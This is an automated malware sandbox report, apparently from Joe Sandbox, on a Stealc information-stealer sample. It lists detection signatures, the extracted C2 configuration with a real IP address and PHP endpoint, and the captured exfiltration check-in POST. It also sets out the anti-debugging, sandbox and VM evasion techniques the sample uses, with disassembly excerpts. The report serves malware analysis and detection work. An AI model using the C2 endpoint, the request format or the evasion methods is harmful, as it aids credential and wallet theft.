Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542671
MD5: 3833a1b7c23d66eecec6b16ddf5cf540
SHA1: 05182934e239a8e6715ada16e0ddcde3b7598e05
SHA256: 96f09e8bd3f67c287a0bb1529d5220d9496a233fba5b1608366a2c280a864dd2
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3833A1B7C23D66EECEC6B16DDF5CF540)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration (StealC): {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5752 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5752 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.a40000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-26T05:55:08.006858+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

                AV Detection

Source: file.exe Avira: detected
Source: 0.2.file.exe.a40000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: http://185.215.113.206/ Virustotal: Detection: 13%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00A4C820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A49AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00A49AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A47240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00A47240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A49B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00A49B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A58EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00A58EA0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00A538B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A54910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00A4DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00A4E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00A4ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00A54570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00A53EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A4F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4F68A FindFirstFileA,0_2_00A4F68A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A416D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A4DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00A4BE70

                Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"4A5C57CE7A89514701825------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"puma------GHDAAKJEGCFCAKEBKJJE--
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A44880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00A44880
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"4A5C57CE7A89514701825------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"puma------GHDAAKJEGCFCAKEBKJJE--
Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php%
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php9
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpE
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpa
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/m
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/t
Source: file.exe, 00000000.00000002.2137808772.0000000001647000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206kz.P6

                System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82821
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB5802
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA895A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DFC97F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EBB156
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1392C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0B11B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CF1263
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE3260
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E06251
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E10254
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DFDCDA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E07CED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D4D4CF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DC3C5D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D4F413
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E0F5B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E02D44
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB6653
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D60608
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CBDE33
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E097E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CDB787
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DFF707
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00A445C0 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: rhebxyzr ZLIB complexity 0.9951511497101891
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A58680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00A58680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A53720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00A53720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0TX10615.htm
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe Static file information: File size 1834496 > 1048576
Source: file.exe Static PE information: Raw size of rhebxyzr is bigger than: 0x100000 < 0x199c00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A59860
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: rhebxyzr
Source: file.exe Static PE information: section name: gzayextq
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CA58C5 push 08B2AEA6h; mov dword ptr [esp], ebp 0_2_00CA755F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CA58C5 push ebx; mov dword ptr [esp], eax 0_2_00CA7587
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CA58C5 push eax; mov dword ptr [esp], esi 0_2_00CA758B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010D1117 push 0696022Ah; mov dword ptr [esp], ecx 0_2_010D114A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EE18A5 push edx; mov dword ptr [esp], eax 0_2_00EE18ED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EE18A5 push 0877DADCh; mov dword ptr [esp], ebp 0_2_00EE1905
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EB20B0 push edx; mov dword ptr [esp], ebx 0_2_00EB2130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push ebx; mov dword ptr [esp], edi 0_2_00CE58C5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push ecx; mov dword ptr [esp], ebx 0_2_00CE5926
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push 0D164635h; mov dword ptr [esp], eax 0_2_00CE592F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push esi; mov dword ptr [esp], edx 0_2_00CE5944
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push 7B888845h; mov dword ptr [esp], ecx 0_2_00CE59D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push eax; mov dword ptr [esp], 00000004h 0_2_00CE5A15
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push ecx; mov dword ptr [esp], 7FC7E779h 0_2_00CE5A43
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CE58B4 push esi; mov dword ptr [esp], ebx 0_2_00CE5AA7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A5B035 push ecx; ret 0_2_00A5B048
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010D1195 push ecx; mov dword ptr [esp], esp 0_2_010D11C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010D1195 push edi; mov dword ptr [esp], 327A8E89h 0_2_010D11F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010D1195 push 4A42F343h; mov dword ptr [esp], edx 0_2_010D12C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010D1195 push ecx; mov dword ptr [esp], eax 0_2_010D12E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010D1195 push edi; mov dword ptr [esp], eax 0_2_010D132E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E7C041 push ebx; mov dword ptr [esp], edx 0_2_00E7C071
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82821 push 11E46429h; mov dword ptr [esp], ebp 0_2_00E82856
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82821 push eax; mov dword ptr [esp], edi 0_2_00E828A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82821 push edi; mov dword ptr [esp], ebx 0_2_00E82973
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82821 push 7F4104CBh; mov dword ptr [esp], ebx 0_2_00E82991
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E82821 push ecx; mov dword ptr [esp], eax 0_2_00E829F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1902B push ebp; mov dword ptr [esp], edx 0_2_00E19066
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1902B push ebx; mov dword ptr [esp], 56284488h 0_2_00E19084
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1902B push 129BD874h; mov dword ptr [esp], ecx 0_2_00E190C1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1902B push edx; mov dword ptr [esp], eax 0_2_00E190E6
Source: file.exe Static PE information: section name: rhebxyzr entropy: 7.953785461765037

                Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13651
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA1C93 second address: CA1C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E092AE second address: E092B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E18A70 second address: E18A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E18FDE second address: E18FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B0E8 second address: E1B0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B0EC second address: CA1C93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 13C84B78h 0x0000000d sub dword ptr [ebp+122D1FCCh], edx 0x00000013 push dword ptr [ebp+122D1711h] 0x00000019 mov di, dx 0x0000001c call dword ptr [ebp+122D2B9Bh] 0x00000022 pushad 0x00000023 jmp 00007F47DD40FB7Eh 0x00000028 stc 0x00000029 xor eax, eax 0x0000002b mov dword ptr [ebp+122D2A10h], ebx 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 cmc 0x00000036 mov dword ptr [ebp+122D2F36h], eax 0x0000003c pushad 0x0000003d jmp 00007F47DD40FB88h 0x00000042 jnp 00007F47DD40FB78h 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D2A10h], eax 0x00000051 mov esi, 0000003Ch 0x00000056 sub dword ptr [ebp+122D3984h], ebx 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 sub dword ptr [ebp+122D2B79h], edx 0x00000066 cmc 0x00000067 lodsw 0x00000069 mov dword ptr [ebp+122D3984h], edi 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jl 00007F47DD40FB7Ch 0x00000079 or dword ptr [ebp+122D1A7Ch], eax 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 jnl 00007F47DD40FB84h 0x00000089 jmp 00007F47DD40FB7Eh 0x0000008e nop 0x0000008f jnc 00007F47DD40FB84h 0x00000095 push eax 0x00000096 pushad 0x00000097 push eax 0x00000098 push edx 0x00000099 jmp 00007F47DD40FB80h 0x0000009e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B12A second address: E1B16D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47DCFB8A3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F47DCFB8A42h 0x00000012 mov edx, ebx 0x00000014 pop ecx 0x00000015 push 00000000h 0x00000017 mov dh, 86h 0x00000019 call 00007F47DCFB8A39h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F47DCFB8A3Ch 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B16D second address: E1B173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B173 second address: E1B177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B177 second address: E1B18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F47DD40FB76h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B18C second address: E1B1A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47DCFB8A43h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B1A3 second address: E1B1EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ebx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F47DD40FB7Ch 0x00000015 popad 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jnp 00007F47DD40FB7Ch 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a jmp 00007F47DD40FB7Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 jc 00007F47DD40FB76h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1B1EB second address: E1B1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B1EF second address: E1B28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov cx, ax 0x0000000b or si, B954h 0x00000010 push 00000003h 0x00000012 mov esi, 47CBA900h 0x00000017 xor dword ptr [ebp+122D22A9h], ebx 0x0000001d push 00000000h 0x0000001f mov ecx, 40D54793h 0x00000024 push 00000003h 0x00000026 xor dword ptr [ebp+122D1B55h], eax 0x0000002c push C54DA7BBh 0x00000031 pushad 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 push esi 0x00000036 pop esi 0x00000037 popad 0x00000038 jmp 00007F47DD40FB81h 0x0000003d popad 0x0000003e xor dword ptr [esp], 054DA7BBh 0x00000045 mov dword ptr [ebp+122D3B06h], eax 0x0000004b lea ebx, dword ptr [ebp+1244D011h] 0x00000051 push 00000000h 